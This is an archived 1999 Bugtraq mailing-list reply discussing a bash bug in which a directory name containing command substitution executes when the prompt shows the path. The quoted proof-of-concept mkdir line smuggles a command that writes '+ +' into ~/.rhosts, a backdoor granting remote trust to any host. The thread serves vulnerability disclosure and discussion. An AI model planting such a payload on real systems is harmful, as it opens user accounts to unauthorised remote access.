Re: Bash Bug

From: Ph. Rueegsegger (philip.rueegseggerat_private)
Date: Fri Apr 23 1999 - 03:25:58 PDT

    Date sent:      	Thu, 22 Apr 1999 01:39:48 +0100
    Send reply to:  	Andy Church <achurchat_private>
    From:           	Andy Church <achurchat_private>
    Subject:        	Re: Bash Bug
    Originally to:  	shadowat_private
    To:             	BUGTRAQat_private

    Hello together

    > >Figured while everyone was working with bash, I might as well
    make this
    > >one public(I apologize if this is old news, apparently it hasnt been fixed
    > >if so).
    > >
    > >If a user creates a directory with a command like
    > >
    > >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

    Not bad !

    > >and someone cd's into said directory, either by accident, or whatever,
    > >then it will cause it to actually execute.
    >
    >      Just to clarify, this only happens if PS1 (the bash prompt) contains
    > \w or \W _and_ a prompt is displayed containing the bogus directory name.
    > This means unattended shell scripts are safe.  As a workaround, use `pwd`
    > in place of \w.

    Sorry, with bash version 2.01.1 (supplied with SuSE5.3) is just the
    opposite of what you are clarifying. If one has \w or \W specified in
    PS1 to show the path, it does NOT happen and if `pwd` is specified
    instead of \w or \W it DOES happen.

    >      Tested with bash 1.14 (it's the only one I have handy).
    >
    >   --Andy Church
    >     achurchat_private
    >     http://achurch.dragonfire.net/

    Kind regards
    Phibus
                         Philip Rueegsegger
                          System Manager

    Bruker AG                Direct dial   : +41-1-825 93 46
    Industriestrasse 26      Telephone     : +41-1-825 91 11
    CH-8117 Faellanden       Telefax       : +41-1-825 94 69
    Switzerland              E-Mail        : philip.rueegseggerat_private